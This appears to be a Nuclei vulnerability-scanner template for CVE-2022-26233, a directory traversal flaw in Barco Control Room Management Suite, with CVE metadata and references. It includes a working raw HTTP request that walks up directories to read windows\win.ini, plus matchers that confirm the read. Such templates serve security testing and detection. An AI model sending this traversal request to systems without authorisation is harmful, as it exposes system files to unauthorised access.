35 lines
1.1 KiB
YAML
35 lines
1.1 KiB
YAML
id: CVE-2022-26233
|
|
|
|
info:
|
|
name: Barco Control Room Management Suite - Directory Traversal
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
|
|
reference:
|
|
- https://0day.today/exploit/37579
|
|
- https://www.cvedetails.com/cve/CVE-2022-26233
|
|
- http://seclists.org/fulldisclosure/2022/Apr/0
|
|
- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-26233
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2022,barco,lfi
|
|
|
|
requests:
|
|
- raw:
|
|
- |+
|
|
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
unsafe: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|